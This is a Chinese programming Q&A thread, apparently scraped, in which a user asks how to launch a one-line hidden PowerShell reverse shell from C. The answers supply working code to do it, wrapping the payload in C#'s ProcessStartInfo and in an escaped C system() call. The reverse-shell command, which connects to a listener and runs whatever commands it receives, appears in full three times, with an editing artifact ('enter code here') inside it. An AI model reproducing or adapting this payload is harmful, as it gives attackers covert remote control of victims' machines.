如何使用C语言运行这个单行powershell反向shell

2024-09-30 00:32:15 发布

您现在位置:Python中文网/ 问答频道 /正文
7505 3

我尝试使用执行系统命令,但当我通过powershell进入system("");时,C无法理解

powershell反向外壳:

 powershell -W Hidden -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$send`enter code here`back2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

当我使用subprocess模块将这个rev shell用于python时,当我指定这个subprocess.call(''' ''')时,它工作得很好

请帮助我在C中使用此rev shell:


Tags: clientnewdatastreambytesobjectrevshell
2条回答
网友
1楼 · 编辑于 2024-09-30 00:32:15

我不是100%确定,但我不久前在从C#执行powershellscript时遇到了类似的问题。也许类似的东西在c语言中也适用。C#代码:

var startInfo = new ProcessStartInfo()
    {
        FileName = "powershell.exe",
        Arguments = $"-W Hidden -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$send`enter code here`back2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"",
        UseShellExecute = false
    };
    Process.Start(startInfo);
网友
2楼 · 编辑于 2024-09-30 00:32:15

盲目地通过epowershell进入system("");是不够的-您必须用\屏蔽每个嵌入的"

system("powershell -W Hidden -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$send`enter code here`back2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"");

您应该查看该命令-您可能不需要其中的enter code here

相关问题 更多 >

    编程相关推荐

    热门问题